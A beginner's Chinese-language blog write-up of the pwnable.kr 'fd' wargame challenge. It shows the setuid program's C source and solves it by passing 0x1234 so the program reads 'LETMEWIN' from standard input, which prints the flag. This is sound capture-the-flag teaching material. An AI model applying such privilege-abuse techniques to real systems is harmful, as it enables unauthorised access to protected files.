Fork me on GitHub

pwnable.kr--fd

前言

最近在做pwnable.kr上的题目,本来也是新手就准备把解题的思路写下来加深印象。
这是第一题,较简单,题目很基础。

分析

先看一下都有什么文件

1
2
3
4
5
fd@ubuntu:~$ ls -l
total 16
-r-sr-x--- 1 fd_pwn fd 7322 Jun 11 2014 fd
-rw-r--r-- 1 root root 418 Jun 11 2014 fd.c
-r--r----- 1 fd_pwn root 50 Jun 11 2014 flag

由于没权限访问flag文件,看来只有通过fd程序的执行来查看了,这里fd.c是源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
len = read(fd, buf, 32);
if(!strcmp("LETMEWIN\n", buf)){
printf("good job :)\n");
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;

}

通过分析源码发现,只要控制使第一个参数为0x1234然后fd=0再输入LETMEWIN\n就可以执行查看flag的命令了。操作一下确实是这样的

1
2
3
4
fd@ubuntu:~$ ./fd `python -c 'print 0x1234'`
LETMEWIN
good job :)
mommy! I think I know what a file descriptor is!!

总结

这道题考察基本的Linux文件操作,适合我这样的萌新,哈哈。

-------------本文结束感谢您的阅读-------------

本文标题:pwnable.kr--fd

文章作者:r00tnb

发布时间:2017年12月06日 - 20:12

最后更新:2018年08月04日 - 22:08

原始链接:https://r00tnb.github.io/2017/12/06/pwnable.kr--fd/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

坚持原创,您的鼓励是我最大的动力!